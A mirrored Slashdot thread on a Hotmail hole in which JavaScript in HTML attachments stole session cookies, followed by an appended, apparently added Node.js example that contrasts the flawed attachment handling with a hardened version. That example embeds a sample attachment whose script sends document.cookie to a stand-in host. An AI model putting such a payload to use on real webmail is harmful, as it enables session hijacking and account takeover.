Slashdot Mirror


Another Hole in Hotmail

Ancipital noted that a new Hotmail hole has sprung up. This one is, like the ILUVYOU bug, a VBS macro attachment that must be executed by people with very (ok, who does this, huh? I mean, viewing a gif or clicking a URL, but running a strange program? The mind boggles).

9 of 219 comments

  1. Hotmail did. by Anonymous Coward · · Score: 5

    I thought this story was quite. Besides being, it was to read! I wonder why Microsoft can't get off, and implement.

    This is not, the JavaScript exploit in existence! Microsoft should, otherwise the users. The mind boggles.

    But then again, I rarely. So who. Well!

  2. A Brief Explanation for the lazy by CiaranMc · · Score: 5

    How this seems to work is that someone emails you an HTML file as an attachment.

    If you then view the attachment through Hotmail, JavaScript in that attachment can then pretend to be from the Hotmail domain, and therefore access any cookies that Hotmail has set up. It can then submit these values to a form on another, hostile, server.

    These cookies then allow access to the site from a user pretending to be you, allowing them to read and delete your emails or send email from your account.

    It's not clear from the article, but presumably the relevant cookie is the one holding the user's session key. In a typical implementation this key will be useless after 30 mins or so, but the length of the timeout is really whatever Microsoft chooses it to be.

    Try logging on to Hotmail, not touching anything for 30 mins and then clicking on 'read mail'. If they have the server set up sensibly, you'll have to enter your user name and password again.

    On the other hand, if Microsoft have done something really really dumb, like including the password in a cookie, then there's really no hope for them.

    -Ciaran

  3. I can't resist...someone has to say it. by hal200 · · Score: 4
    C is for cookie, that's good enough for me!

    Ah. I feel MUCH better now! Now I have to go delete some email before I lose my cookies! <grin>

    --

    I just want to take over the world...Why does that automatically make me EVIL?

  4. Formatting the same as erasing? by LordNimon · · Score: 5
    Your post underscores the fact that many technical people have forgotten the original meaning of the words they use. It's really a shame.

    To you and me, formatting means erasing. But that's only true in techno-speak. In every other context, the word "format" does not imply erasing - not at all! And since very few people actually format their hard drives (and hence, have no experience with the process), how can you expect them to know what that word means?

    When you "format" something, you arrange it. You put it into some kind of order. To most people, that's a good thing! The moron who decided that "format" is a synonym for "erase" should be shot.

    If your application had asked the user to "erase all files on your hard drive", I think very few people would have said yes.

    --
    And the men who hold high places must be the ones who start
    To mold a new reality... closer to the heart
  5. Social Engineering is easier by zpengo · · Score: 5
    I've seen websites that claim to give people access to anyone's Hotmail account. All you have to do is send an e-mail to a particular address that looks valid (something like account-password@hotmail.com) and give them the login of the person whose acct you want to get into, as well as your own login and password.

    I wonder how many people fell into that trap, thinking they were gonna get into someone else's account.

    --


    Got Rhinos?
  6. You'd be surprised. by RavenWolf · · Score: 5

    I wrote a little "application" that was a simple little dialog box that asked the user if he wished to format the hard drive (in so many words) to see just how many of our in-house users really read those messages - and attached it to an email sent to everyone in the office (around 150 users). (Results were then sent to my computer through a TCP connection, for those interested.) 1 out of 3 users clicked yes.

  7. File extensions by Chris Hiner · · Score: 5

    What a lot of us forget is that Windows 95 defaults to not showing the extension for files it knows the type of. So if you name a file NIFTY_PICTURE.GIF.VBS, a lot of non-technical people will see it as NIFTY_PICTURE.GIF. But when they double click it, it runs...
    (Win98 may default to this too, I don't remember)

    I suspect lots of nongeeks leave it at the default...

  8. Re:question about the above statement by Erasmus Darwin · · Score: 5
    It's not the grammar that bothers me, so much as the inaccuracy of the summary. It isn't a VBS attachment that causes the problem, but rather a plain HTML attachment with embedded javascript. Even in a world of "intelligent" users, HTML is expected to be a "safer" document format, rather than "dangerous" executable code.

    I think there're a number of people you could assign the blame to, but no one entity that's "fully stupid". Users should be more careful, Hotmail should attempt some filtering, but most importantly the W3C should provide a means of denoting "third-party" HTML (and other documents) that appears to be from the server, but in reality was placed there by someone else (such as an attachment to an email or a comment in a message board that doesn't restrict HTML).

  9. The actual nature of the Hotmail hole by sammy baby · · Score: 5

    Contrary to the reporting on /., the most recent Hotmail hole is in no way related to a VBS script. What's so alarming about the hole is that it is actually an HTML file which contains the exploit. More specifically:

    The folks over at Hotmail were smart enough to filter out JavaScript from HTML formatted messages sent to Hotmail recipients. They did not, however, think that it would be necessary to filter HTML attachments, either. As a result, a clever individual was able to construct an HTML page containing JavaScript which forwards HotMail authorization cookies to a third party.

    Ironically, this information is largely reproduced from the article on Peacefire cited in the original post. No mention of VBS files anywhere.
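The mechanism that comments 2 and 9 describe, modelled in a small Node.js script. This is an added example and is not code from the thread, from Peacefire or from Hotmail; the hostnames, the cookie jar, the attachment payload and the function names are all constructed for illustration. It shows the two things a practitioner should take from the thread: a filter applied to message bodies but not to attachments leaves the attachment path open, and attacker-supplied HTML rendered inline from the same host as the session cookie can read that cookie, whereas the same markup served from a separate, cookie-less host cannot.

```javascript
// Added example (not from the Slashdot thread). Hostnames, cookie names and the
// attachment below are constructed for illustration, not Hotmail's real values.

const MAIL_ORIGIN = "https://mail.example.com";   // assumed host that owns the session cookie
const ATTACH_ORIGIN = "https://att-example.net";  // assumed separate host with no cookies

// Constructed cookie jar: one session cookie scoped to the mail host.
const COOKIE_JAR = [{ name: "session", domain: "mail.example.com" }];

// Crude check for active content. A real filter must parse the HTML; this is only
// enough to show that the attachment path needs the same check as the message body.
const ACTIVE_CONTENT = [
  /<script\b/i,           // <script> blocks
  /\son[a-z]+\s*=/i,      // inline handlers such as onload= / onerror=
  /javascript:/i,         // javascript: URLs in href/src
];
function hasActiveContent(html) {
  return ACTIVE_CONTENT.some((re) => re.test(html));
}

// Constructed attachment of the kind the thread describes: plain HTML whose
// script reads document.cookie and sends it to a third-party server.
const HOSTILE_ATTACHMENT = `<html><body>
<script>
  new Image().src = "http://hostile.example/collect?c=" + encodeURIComponent(document.cookie);
</script>
</body></html>`;

// Cookies are exposed to script by host: markup served from a host gets only
// the cookies scoped to that host.
function cookiesVisibleTo(servedFrom, jar) {
  const host = new URL(servedFrom).hostname;
  return jar.filter((c) => c.domain === host).map((c) => c.name);
}

// Behaviour as the thread describes it: message bodies are filtered, attachments
// are served unfiltered, inline, from the mail host itself.
function serveAttachmentOriginal(html) {
  return { origin: MAIL_ORIGIN, contentType: "text/html", disposition: "inline", body: html };
}

// Hardened: run the same active-content check on attachments, downgrade anything
// that fails it to text/plain, and serve attachments from a separate host as a
// download rather than as an inline page.
function serveAttachmentHardened(html) {
  const active = hasActiveContent(html);
  return {
    origin: ATTACH_ORIGIN,
    contentType: active ? "text/plain" : "text/html",
    disposition: "attachment",
    body: html,
  };
}

// Which cookie names an attachment's script could read under a given response:
// none unless it is rendered inline as HTML and actually contains script, and
// then only the cookies scoped to the host it was served from.
function exposedCookies(response, jar) {
  const rendersScript =
    response.contentType === "text/html" &&
    response.disposition === "inline" &&
    hasActiveContent(response.body);
  return rendersScript ? cookiesVisibleTo(response.origin, jar) : [];
}

// Usage: compare what the hostile attachment can reach under each policy.
console.log("original :", exposedCookies(serveAttachmentOriginal(HOSTILE_ATTACHMENT), COOKIE_JAR));
console.log("hardened :", exposedCookies(serveAttachmentHardened(HOSTILE_ATTACHMENT), COOKIE_JAR));
```

Serving user-supplied documents from a host that carries no session cookies is the structural fix; the regex filter is only a second line of defence, since tag-matching filters are routinely bypassed. Comment 8's wish for a standard way to mark "third-party" HTML is what browsers later delivered with sandboxed iframes and Content-Security-Policy, which the thread predates.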